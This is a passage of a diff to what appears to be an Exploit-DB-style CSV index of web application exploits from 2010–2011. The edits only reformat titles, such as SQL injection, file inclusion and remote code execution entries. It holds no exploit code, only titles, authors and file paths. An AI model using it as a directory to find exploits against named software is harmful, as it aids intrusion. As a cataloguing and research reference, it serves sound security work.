Injection",2010-10-08,ZoRLu,asp,webapps,0 15220,platforms/php/webapps/15220.txt,"Flex Timesheet - Authentication Bypass",2010-10-08,KnocKout,php,webapps,0 15222,platforms/php/webapps/15222.txt,"Joomla! Component Community Builder Enhanced (CBE) 1.4.8/1.4.9/1.4.10 - Local File Inclusion / Remote Code Execution",2010-10-09,"Delf Tonder",php,webapps,0 15223,platforms/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,php,webapps,0 @@ -24180,7 +24183,7 @@ id,file,description,date,author,platform,type,port 15468,platforms/php/webapps/15468.txt,"Joomla! Component btg_oglas - HTML / Cross-Site Scripting Injection",2010-11-09,CoBRa_21,php,webapps,0 15469,platforms/php/webapps/15469.txt,"Joomla! Component com_markt - SQL Injection",2010-11-09,CoBRa_21,php,webapps,0 15470,platforms/php/webapps/15470.txt,"Joomla! Component com_img - Local File Inclusion",2010-11-09,CoBRa_21,php,webapps,0 -15484,platforms/php/webapps/15484.txt,"FCKEditor Core 2.x 2.4.3 - (FileManager upload.php) Arbitrary File Upload",2010-11-10,grabz,php,webapps,0 +15484,platforms/php/webapps/15484.txt,"FCKEditor Core 2.x 2.4.3 - 'FileManager upload.php' Arbitrary File Upload",2010-11-10,grabz,php,webapps,0 15472,platforms/php/webapps/15472.txt,"osCommerce 2.2 - Cross-Site Request Forgery",2010-11-09,daandeveloper33,php,webapps,0 15473,platforms/multiple/webapps/15473.html,"IBM OmniFind - Cross-Site Request Forgery",2010-11-09,"Fatih Kilic",multiple,webapps,0 15490,platforms/php/webapps/15490.txt,"XT:Commerce < 3.04 SP2.1 - Cross-Site Scripting",2010-11-11,"Philipp Niedziela",php,webapps,0 @@ -24222,7 +24225,7 @@ id,file,description,date,author,platform,type,port 15563,platforms/asp/webapps/15563.txt,"Sitefinity CMS - 'ASP.NET' Arbitrary File Upload",2010-11-17,Net.Edit0r,asp,webapps,0 15564,platforms/php/webapps/15564.txt,"Front Accounting 2.3RC2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2010-11-17,"Juan Manuel Garcia",php,webapps,0 15565,platforms/php/webapps/15565.txt,"Front Accounting 2.3RC2 - Multiple SQL Injections",2010-11-17,"Juan Manuel Garcia",php,webapps,0 -15567,platforms/php/webapps/15567.txt,"WebRCSdiff 0.9 - (viewver.php) Remote File Inclusion",2010-11-18,FL0RiX,php,webapps,0 +15567,platforms/php/webapps/15567.txt,"WebRCSdiff 0.9 - 'viewver.php' Remote File Inclusion",2010-11-18,FL0RiX,php,webapps,0 15568,platforms/php/webapps/15568.py,"chCounter 3.1.3 - SQL Injection",2010-11-18,"Matias Fontanini",php,webapps,0 15570,platforms/php/webapps/15570.php,"Joomla! Component 'com_mtree' 2.1.6 - Overwrite Cross-Site Request Forgery",2010-11-18,jdc,php,webapps,0 15571,platforms/php/webapps/15571.txt,"fozzcom shopping<= 7.94+8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 @@ -24264,7 +24267,7 @@ id,file,description,date,author,platform,type,port 15656,platforms/php/webapps/15656.txt,"LittlePhpGallery 1.0.2 - Local File Inclusion",2010-12-01,"kire bozorge khavarmian",php,webapps,0 15659,platforms/php/webapps/15659.txt,"Contenido CMS 4.8.12 - Cross-Site Scripting",2010-12-02,"High-Tech Bridge SA",php,webapps,0 15660,platforms/php/webapps/15660.txt,"etomite 1.1 - Multiple Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 -15661,platforms/asp/webapps/15661.txt,"Ananda Real Estate 3.4 - (list.asp) Multiple SQL Injection",2010-12-02,underground-stockholm.com,asp,webapps,0 +15661,platforms/asp/webapps/15661.txt,"Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injection",2010-12-02,underground-stockholm.com,asp,webapps,0 15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal 2 - 'travelbycountry.asp' SQL Injection",2010-12-03,"Ulrik Persson",asp,webapps,0 15666,platforms/hardware/webapps/15666.txt,"Multiple D-Link Routers (Multiple Models) - Authentication Bypass",2010-12-03,"Craig Heffner",hardware,webapps,0 15673,platforms/asp/webapps/15673.txt,"Dejcom Market CMS - 'showbrand.aspx' SQL Injection",2010-12-04,Mormoroth,asp,webapps,0 @@ -24348,7 +24351,7 @@ id,file,description,date,author,platform,type,port 15816,platforms/php/webapps/15816.txt,"CubeCart 3.0.4 - SQL Injection",2010-12-23,Dr.NeT,php,webapps,0 15818,platforms/php/webapps/15818.txt,"iDevSpot iDevCart 1.10 - Multiple Local File Inclusion",2010-12-24,v3n0m,php,webapps,0 15819,platforms/php/webapps/15819.txt,"Joomla! Component 'com_xmovie' 1.0 - Local File Inclusion",2010-12-24,KelvinX,php,webapps,0 -15820,platforms/php/webapps/15820.txt,"SquareCMS 0.3.1 - (post.php) SQL Injection",2010-12-24,cOndemned,php,webapps,0 +15820,platforms/php/webapps/15820.txt,"SquareCMS 0.3.1 - 'post.php' SQL Injection",2010-12-24,cOndemned,php,webapps,0 15822,platforms/php/webapps/15822.html,"CubeCart 3.0.6 - Cross-Site Request Forgery (Add Admin)",2010-12-24,"P0C T34M",php,webapps,0 15824,platforms/php/webapps/15824.txt,"Pligg CMS 1.1.2 - Blind SQL Injection / Cross-Site Scripting",2010-12-25,"Michael Brooks",php,webapps,0 15825,platforms/php/webapps/15825.txt,"openauto 1.6.3 - Multiple Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0 @@ -24366,7 +24369,7 @@ id,file,description,date,author,platform,type,port 15843,platforms/php/webapps/15843.txt,"News Script PHP Pro - 'FCKeditor' Arbitrary File Upload",2010-12-29,Net.Edit0r,php,webapps,0 15846,platforms/php/webapps/15846.txt,"kaibb 1.0.1 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 15847,platforms/php/webapps/15847.txt,"DzTube - SQL Injection",2010-12-29,"errnick qwe",php,webapps,0 -15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - (group.php) SQL Injection",2010-12-29,hiphop,php,webapps,0 +15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - 'group.php' SQL Injection",2010-12-29,hiphop,php,webapps,0 15849,platforms/php/webapps/15849.txt,"LoveCMS 1.6.2 - Cross-Site Request Forgery / Code Injection",2010-12-29,hiphop,php,webapps,0 15850,platforms/php/webapps/15850.html,"PiXie CMS 1.04 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-12-29,"Ali Raheem",php,webapps,0 15852,platforms/php/webapps/15852.txt,"Siteframe CMS 3.2.3 - 'user.php' SQL Injection",2010-12-29,"AnGrY BoY",php,webapps,0 @@ -24375,7 +24378,7 @@ id,file,description,date,author,platform,type,port 15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0 15858,platforms/php/webapps/15858.txt,"WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 NS8.1)",2010-12-29,Saif,php,webapps,0 15863,platforms/php/webapps/15863.txt,"LightNEasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 -15864,platforms/php/webapps/15864.txt,"Ignition 1.3 - (page.php) Local File Inclusion",2010-12-30,cOndemned,php,webapps,0 +15864,platforms/php/webapps/15864.txt,"Ignition 1.3 - 'page.php' Local File Inclusion",2010-12-30,cOndemned,php,webapps,0 15865,platforms/php/webapps/15865.php,"Ignition 1.3 - Remote Code Execution",2010-12-30,cOndemned,php,webapps,0 15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - Cross-Site Scripting / Remote Code Execution",2011-01-05,mr_me,php,webapps,0 15886,platforms/php/webapps/15886.txt,"KLINK - SQL Injection",2011-01-01,"Mauro Rossi and Andres Gomez",php,webapps,0 @@ -24422,7 +24425,7 @@ id,file,description,date,author,platform,type,port 15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 - (bid) Blind SQL Injection",2011-01-16,"BorN To K!LL",php,webapps,0 16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent Cross-Site Scripting",2011-01-16,"Mark Stanislav",php,webapps,0 16001,platforms/php/webapps/16001.txt,"Joomla! Component com_people 1.0.0 - Local File Inclusion",2011-01-16,ALTBTA,php,webapps,0 -16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 - (cart.php) Blind SQL Injection",2011-01-16,ShivX,php,webapps,0 +16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 - 'cart.php' Blind SQL Injection",2011-01-16,ShivX,php,webapps,0 16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon - SQL Injection",2011-01-17,Saif,php,webapps,0 16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0 16010,platforms/php/webapps/16010.txt,"Joomla! Component allCineVid 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0 @@ -24508,7 +24511,7 @@ id,file,description,date,author,platform,type,port 16199,platforms/php/webapps/16199.txt,"Icy Phoenix 1.3.0.53a - HTTP Referer Persistent Cross-Site Scripting",2011-02-20,"Saif El-Sherei",php,webapps,0 16200,platforms/php/webapps/16200.py,"JAKCMS 2.01 - Code Execution",2011-02-20,mr_me,php,webapps,0 16201,platforms/php/webapps/16201.py,"JAKCMS 2.01 RC1 - Blind SQL Injection",2011-02-20,mr_me,php,webapps,0 -16202,platforms/php/webapps/16202.txt,"Woltlab Burning Board 2.3.6 Addon - (hilfsmittel.php) SQL Injection",2011-02-21,Crazyball,php,webapps,0 +16202,platforms/php/webapps/16202.txt,"Woltlab Burning Board 2.3.6 Addon - 'hilfsmittel.php' SQL Injection",2011-02-21,Crazyball,php,webapps,0 16205,platforms/asp/webapps/16205.txt,"DIY Web CMS - Multiple Vulnerabilities",2011-02-22,p0pc0rn,asp,webapps,0 16206,platforms/php/webapps/16206.txt,"Galilery 1.0 - Local File Inclusion",2011-02-22,lemlajt,php,webapps,0 16207,platforms/php/webapps/16207.txt,"dotProject 2.1.5 - Multiple Vulnerabilities",2011-02-22,lemlajt,php,webapps,0 @@ -24536,7 +24539,7 @@ id,file,description,date,author,platform,type,port 16266,platforms/php/webapps/16266.txt,"Quicktech - SQL Injection",2011-03-02,eXeSoul,php,webapps,0 16267,platforms/php/webapps/16267.txt,"Bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0 16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection",2011-03-02,DSecurity,php,webapps,0 -16273,platforms/php/webapps/16273.php,"WordPress Plugin PHP Speedy 0.5.2 - (admin_container.php) Remote Code Execution",2011-03-04,mr_me,php,webapps,0 +16273,platforms/php/webapps/16273.php,"WordPress Plugin PHP Speedy 0.5.2 - 'admin_container.php' Remote Code Execution",2011-03-04,mr_me,php,webapps,0 16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Exploit",2011-03-04,kingcope,jsp,webapps,0 16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs - 'view.php' SQL Injection",2011-03-04,IRAQ_JAGUAR,php,webapps,0 16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -24648,7 +24651,7 @@ id,file,description,date,author,platform,type,port 17098,platforms/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - Cross-Site Scripting",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17099,platforms/php/webapps/17099.txt,"Feng Office 1.7.3.3 - Cross-Site Request Forgery",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17100,platforms/php/webapps/17100.txt,"spidaNews 1.0 - news.php 'id' SQL Injection",2011-04-02,"Easy Laster",php,webapps,0 -17101,platforms/php/webapps/17101.txt,"ilchClan 1.0.5 - (regist.php) SQL Injection",2011-04-02,"Easy Laster",php,webapps,0 +17101,platforms/php/webapps/17101.txt,"ilchClan 1.0.5 - 'regist.php' SQL Injection",2011-04-02,"Easy Laster",php,webapps,0 17102,platforms/php/webapps/17102.txt,"Anzeigenmarkt 2011 - 'index.php' SQL Injection",2011-04-02,"Easy Laster",php,webapps,0 17103,platforms/php/webapps/17103.txt,"Advanced Image Hosting 2.2 - 'index.php' SQL Injection",2011-04-03,keracker,php,webapps,0 17106,platforms/php/webapps/17106.txt,"Rash CMS - SQL Injection",2011-04-03,keracker,php,webapps,0 @@ -24701,7 +24704,7 @@ id,file,description,date,author,platform,type,port 17206,platforms/php/webapps/17206.txt,"Realmarketing CMS - Multiple SQL Injections",2011-04-22,^Xecuti0N3r,php,webapps,0 17207,platforms/php/webapps/17207.txt,"WordPress Plugin Ajax Category Dropdown 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 17211,platforms/php/webapps/17211.txt,"mySeatXT 0.1781 - SQL Injection",2011-04-25,"AutoSec Tools",php,webapps,0 -17212,platforms/php/webapps/17212.txt,"OrangeHRM 2.6.3 - (PluginController.php) Local File Inclusion",2011-04-25,"AutoSec Tools",php,webapps,0 +17212,platforms/php/webapps/17212.txt,"OrangeHRM 2.6.3 - 'PluginController.php' Local File Inclusion",2011-04-25,"AutoSec Tools",php,webapps,0 17213,platforms/php/webapps/17213.txt,"phpmychat plus 1.93 - Multiple Vulnerabilities",2011-04-25,"AutoSec Tools",php,webapps,0 17214,platforms/php/webapps/17214.php,"WordPress Plugin SermonBrowser 0.43 - SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 17215,platforms/hardware/webapps/17215.txt,"Snom IP Phone Web Interface < 8 - Multiple Vulnerabilities",2011-04-26,"Yakir Wizman",hardware,webapps,0 @@ -24725,10 +24728,10 @@ id,file,description,date,author,platform,type,port 17259,platforms/cgi/webapps/17259.txt,"f-fileman 7.0 - Directory Traversal",2011-05-07,"Raffaele Forte",cgi,webapps,0 17264,platforms/php/webapps/17264.txt,"Joomla! Component 'com_versioning' - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0 17265,platforms/php/webapps/17265.txt,"Joomla! Component com_hello - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0 -17267,platforms/php/webapps/17267.txt,"Traidnt UP 2.0 - (view.php) SQL Injection",2011-05-10,ScOrPiOn,php,webapps,0 +17267,platforms/php/webapps/17267.txt,"Traidnt UP 2.0 - 'view.php' SQL Injection",2011-05-10,ScOrPiOn,php,webapps,0 17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server - Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0 17284,platforms/php/webapps/17284.txt,"WordPress Plugin EditorMonkey 2.5 - 'FCKeditor' Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0 -17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 - (banner_manager.php) Arbitrary File Upload",2011-05-14,"Number 7",php,webapps,0 +17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 - 'banner_manager.php' Arbitrary File Upload",2011-05-14,"Number 7",php,webapps,0 17288,platforms/php/webapps/17288.txt,"Joomla! Component 'com_question' - SQL Injection",2011-05-15,"NeX HaCkEr",php,webapps,0 17289,platforms/php/webapps/17289.txt,"frame-oshop - SQL Injection",2011-05-15,-SmoG-,php,webapps,0 17292,platforms/php/webapps/17292.txt,"MediaInSpot CMS - Local File Inclusion (2)",2011-05-16,"wlhaan haker",php,webapps,0 @@ -24747,7 +24750,7 @@ id,file,description,date,author,platform,type,port 17314,platforms/php/webapps/17314.txt,"vBulletin 4.0.x 4.1.2 - 'search.php' SQL Injection",2011-05-23,D4rkB1t,php,webapps,0 17316,platforms/php/webapps/17316.txt,"PHPortfolio - SQL Injection",2011-05-23,lionaneesh,php,webapps,0 17320,platforms/php/webapps/17320.txt,"i-doIT 0.9.9-4 - Local File Inclusion",2011-05-25,"AutoSec Tools",php,webapps,0 -17321,platforms/php/webapps/17321.txt,"Extcalendar 2.0b2 - (cal_search.php) SQL Injection",2011-05-25,"High-Tech Bridge SA",php,webapps,0 +17321,platforms/php/webapps/17321.txt,"Extcalendar 2.0b2 - 'cal_search.php' SQL Injection",2011-05-25,"High-Tech Bridge SA",php,webapps,0 17322,platforms/php/webapps/17322.txt,"eGroupWare 1.8.001.20110421 - Multiple Vulnerabilities",2011-05-25,"AutoSec Tools",php,webapps,0 17324,platforms/php/webapps/17324.rb,"AWStats Totals 1.14 multisort - Remote Command Execution (Metasploit)",2011-05-25,Metasploit,php,webapps,0 17325,platforms/php/webapps/17325.py,"Clipbucket 2.4 RC2 645 - SQL Injection",2011-05-26,"AutoSec Tools",php,webapps,0 @@ -24817,7 +24820,7 @@ id,file,description,date,author,platform,type,port 17483,platforms/php/webapps/17483.txt,"DMXReady Account List Manager 1.2 - SQL Injection",2011-07-04,Bellatrix,php,webapps,0 17484,platforms/php/webapps/17484.txt,"DmxReady Links Manager 1.2 - SQL Injection",2011-07-04,Bellatrix,php,webapps,0 17485,platforms/php/webapps/17485.txt,"PhpFood CMS 2.00 - SQL Injection",2011-07-04,kaMtiEz,php,webapps,0 -17487,platforms/php/webapps/17487.php,"WeBid 1.0.2 - (converter.php) Remote Code Execution",2011-07-04,EgiX,php,webapps,0 +17487,platforms/php/webapps/17487.php,"WeBid 1.0.2 - 'converter.php' Remote Code Execution",2011-07-04,EgiX,php,webapps,0 17493,platforms/asp/webapps/17493.txt,"DmxReady Secure Document Library 1.2 - SQL Injection",2011-07-05,Bellatrix,asp,webapps,0 17495,platforms/php/webapps/17495.txt,"BbZL.php - File Inclusion",2011-07-06,"Number 7",php,webapps,0 17496,platforms/php/webapps/17496.txt,"Joomla! 1.6.3 - Cross-Site Request Forgery",2011-07-06,"Luis Santana",php,webapps,0 @@ -24879,7 +24882,7 @@ id,file,description,date,author,platform,type,port 17639,platforms/php/webapps/17639.txt,"XpressEngine 1.4.5.7 - Persistent Cross-Site Scripting",2011-08-08,v0nSch3lling,php,webapps,0 17640,platforms/php/webapps/17640.txt,"BlogPHP 2.0 - Persistent Cross-Site Scripting",2011-08-09,Paulzz,php,webapps,0 17641,platforms/php/webapps/17641.txt,"LaserNet CMS 1.5 - SQL Injection (1)",2011-08-09,p0pc0rn,php,webapps,0 -17644,platforms/php/webapps/17644.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (2)",2011-08-09,pentesters.ir,php,webapps,0 +17644,platforms/php/webapps/17644.txt,"FCKEditor Core - 'FileManager test.html' Arbitrary File Upload (2)",2011-08-09,pentesters.ir,php,webapps,0 17646,platforms/php/webapps/17646.txt,"Joomla! Component Search 3.0.0 - SQL Injection",2011-08-09,NoGe,php,webapps,0 17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 - DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0 17666,platforms/php/webapps/17666.txt,"Prediction Football 2.51 - Cross-Site Request Forgery",2011-08-14,"Smith Falcon",php,webapps,0 @@ -25050,21 +25053,21 @@ id,file,description,date,author,platform,type,port 17957,platforms/php/webapps/17957.txt,"Roundcube Webmail 0.3.1 - Cross-Site Request Forgery / SQL Injection",2011-10-10,"Smith Falcon",php,webapps,0 17958,platforms/php/webapps/17958.txt,"cotonti CMS 0.9.4 - Multiple Vulnerabilities",2011-10-10,LiquidWorm,php,webapps,0 17959,platforms/php/webapps/17959.txt,"POSH - Multiple Vulnerabilities",2011-10-10,Crashfr,php,webapps,0 -17961,platforms/php/webapps/17961.txt,"MyBB Advanced Forum Signatures - (afsignatures-2.0.4) SQL Injection",2011-10-10,Mario_Vs,php,webapps,0 +17961,platforms/php/webapps/17961.txt,"MyBB Advanced Forum Signatures - 'afsignatures-2.0.4' SQL Injection",2011-10-10,Mario_Vs,php,webapps,0 17962,platforms/php/webapps/17962.txt,"MyBB Forum Userbar Plugin (Userbar 2.2) - SQL Injection",2011-10-10,Mario_Vs,php,webapps,0 17980,platforms/php/webapps/17980.txt,"WordPress Plugin Contact Form 2.7.5 - SQL Injection",2011-10-14,Skraps,php,webapps,0 17983,platforms/php/webapps/17983.txt,"WordPress Plugin Photo Album Plus 4.1.1 - SQL Injection",2011-10-15,Skraps,php,webapps,0 -17984,platforms/php/webapps/17984.txt,"Ruubikcms 1.1.0 - (/extra/image.php) Local File Inclusion",2011-10-16,"Sangyun YOO",php,webapps,0 +17984,platforms/php/webapps/17984.txt,"Ruubikcms 1.1.0 - '/extra/image.php' Local File Inclusion",2011-10-16,"Sangyun YOO",php,webapps,0 17987,platforms/php/webapps/17987.txt,"WordPress Plugin BackWPUp 2.1.4 - Code Execution",2011-10-17,"Sense of Security",php,webapps,0 -17994,platforms/php/webapps/17994.php,"Dolphin 7.0.7 - (member_menu_queries.php) Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0 +17994,platforms/php/webapps/17994.php,"Dolphin 7.0.7 - 'member_menu_queries.php' Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0 17989,platforms/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game - Persistent Cross-Site Scripting",2011-10-17,M.Jock3R,php,webapps,0 17992,platforms/php/webapps/17992.txt,"GNUBoard 4.33.02 - 'tp.php' PATH_INFO SQL Injection",2011-10-17,flyh4t,php,webapps,0 17995,platforms/php/webapps/17995.txt,"Joomla! Plugin NoNumber Framework - Multiple Vulnerabilities",2011-10-18,jdc,php,webapps,0 17997,platforms/php/webapps/17997.txt,"Yet Another CMS 1.0 - SQL Injection / Cross-Site Scripting",2011-10-19,"Stefan Schurtz",php,webapps,0 17998,platforms/php/webapps/17998.txt,"Openemr-4.1.0 - SQL Injection",2011-10-19,"I2sec-dae jin Oh",php,webapps,0 -17999,platforms/php/webapps/17999.txt,"WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - (cart.php) Local File Disclosure",2011-10-19,"Lagripe-Dz and Mca-Crb",php,webapps,0 +17999,platforms/php/webapps/17999.txt,"WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - 'cart.php' Local File Disclosure",2011-10-19,"Lagripe-Dz and Mca-Crb",php,webapps,0 18000,platforms/php/webapps/18000.txt,"1024 CMS 1.1.0 Beta - 'force_download.php' Local File Inclusion",2011-10-19,"Sangyun YOO",php,webapps,0 -18001,platforms/php/webapps/18001.txt,"CMSmini 0.2.2 - Local File Inclusion",2011-10-20,BeopSeong/I2Sec,php,webapps,0 +18001,platforms/php/webapps/18001.txt,"CMS mini 0.2.2 - Local File Inclusion",2011-10-20,BeopSeong/I2Sec,php,webapps,0 18002,platforms/php/webapps/18002.txt,"Uiga Personal Portal - Multiple Vulnerabilities",2011-10-20,"Eyup CELIK",php,webapps,0 18003,platforms/php/webapps/18003.txt,"fims File Management System 1.2.1a - Multiple Vulnerabilities",2011-10-20,Skraps,php,webapps,0 18004,platforms/php/webapps/18004.txt,"Simple Free PHP Forum Script - SQL Injection",2011-10-20,Skraps,php,webapps,0 @@ -25101,10 +25104,10 @@ id,file,description,date,author,platform,type,port 18075,platforms/php/webapps/18075.txt,"Ajax File and Image Manager 1.0 Final - Remote Code Execution",2011-11-04,EgiX,php,webapps,0 18076,platforms/php/webapps/18076.txt,"Advanced Poll 2.02 - SQL Injection",2011-11-04,"Yassin Aboukir",php,webapps,0 18077,platforms/windows/webapps/18077.txt,"HP Data Protector Media Operations 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",windows,webapps,0 -18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x - (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0 -18083,platforms/php/webapps/18083.php,"ZenPhoto 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 -18084,platforms/php/webapps/18084.php,"PHPMyFAQ 2.7.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 -18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 +18081,platforms/php/webapps/18081.txt,"WHMCompleteSolution (WHMCS) 3.x.x - 'clientarea.php' Local File Disclosure",2011-11-04,"red virus",php,webapps,0 +18083,platforms/php/webapps/18083.php,"ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,php,webapps,0 +18084,platforms/php/webapps/18084.php,"PHPMyFAQ 2.7.0 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,php,webapps,0 +18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18088,platforms/php/webapps/18088.txt,"WHMCompleteSolution 3.x/4.x - Multiple Vulnerabilities",2011-11-07,ZxH-Labs,php,webapps,0 18090,platforms/php/webapps/18090.txt,"LabStoRe 1.5.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 18091,platforms/php/webapps/18091.txt,"OrderSys 1.6.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 @@ -25114,13 +25117,13 @@ id,file,description,date,author,platform,type,port 18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0 18108,platforms/php/webapps/18108.rb,"Support Incident Tracker 3.65 - Remote Command Execution (Metasploit)",2011-11-13,Metasploit,php,webapps,0 18110,platforms/php/webapps/18110.txt,"Mambo 4.x - 'Zorder' SQL Injection",2011-11-13,"KraL BeNiM",php,webapps,0 -18111,platforms/php/webapps/18111.php,"WordPress Plugin Zingiri 2.2.3 - (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 -18132,platforms/php/webapps/18132.php,"Support Incident Tracker 3.65 - (translate.php) Remote Code Execution",2011-11-19,EgiX,php,webapps,0 +18111,platforms/php/webapps/18111.php,"WordPress Plugin Zingiri 2.2.3 - 'ajax_save_name.php' Remote Code Execution",2011-11-13,EgiX,php,webapps,0 +18132,platforms/php/webapps/18132.php,"Support Incident Tracker 3.65 - 'translate.php' Remote Code Execution",2011-11-19,EgiX,php,webapps,0 18114,platforms/php/webapps/18114.txt,"WordPress Plugin AdRotate 3.6.6 - SQL Injection",2011-11-14,"Miroslav Stampar",php,webapps,0 18115,platforms/php/webapps/18115.txt,"Pixie CMS 1.01 < 1.04 - Blind SQL Injections",2011-11-14,Piranha,php,webapps,0 18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Time-Based SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0 18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq Arbitrary File Upload",2011-11-15,PCA,php,webapps,0 -18121,platforms/php/webapps/18121.txt,"FreeWebShop 2.2.9 R2 - (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0 +18121,platforms/php/webapps/18121.txt,"FreeWebShop 2.2.9 R2 - 'ajax_save_name.php' Remote Code Execution",2011-11-16,EgiX,php,webapps,0 18122,platforms/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN - SQL Injection",2011-11-16,"Asheesh kumar",hardware,webapps,0 18126,platforms/php/webapps/18126.txt,"WordPress Plugin jetpack - 'sharedaddy.php' ID SQL Injection",2011-11-19,longrifle0x,php,webapps,0 18127,platforms/php/webapps/18127.txt,"Freelancer Calendar 1.01 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 @@ -25129,7 +25132,7 @@ id,file,description,date,author,platform,type,port 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,php,webapps,0 18148,platforms/php/webapps/18148.pl,"PHP-Nuke 8.1.0.3.5b - (Downloads) Blind SQL Injection",2011-11-23,Dante90,php,webapps,0 18149,platforms/php/webapps/18149.php,"PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (1)",2011-11-23,EgiX,php,webapps,0 -18151,platforms/php/webapps/18151.php,"Log1 CMS 2.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0 +18151,platforms/php/webapps/18151.php,"Log1 CMS 2.0 - 'ajax_create_folder.php' Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0 18153,platforms/cgi/webapps/18153.txt,"LibLime Koha 4.2 - Local File Inclusion",2011-11-24,"Akin Tosunlar",cgi,webapps,0 18155,platforms/php/webapps/18155.txt,"Zabbix 1.8.4 - 'popup.php' SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0 18156,platforms/php/webapps/18156.txt,"PHP video script - SQL Injection",2011-11-25,longrifle0x,php,webapps,0 @@ -25158,7 +25161,7 @@ id,file,description,date,author,platform,type,port 18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0 18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post Cross-Site Request Forgery",2011-12-11,hackme,php,webapps,0 18239,platforms/php/webapps/18239.rb,"Traq 2.3 - Authentication Bypass / Remote Code Execution (Metasploit)",2011-12-13,Metasploit,php,webapps,0 -18243,platforms/php/webapps/18243.rb,"PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (2) (Metasploit)",2011-12-14,Metasploit,php,webapps,0 +18243,platforms/php/webapps/18243.rb,"PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (2) (Metasploit)",2011-12-14,Metasploit,php,webapps,0 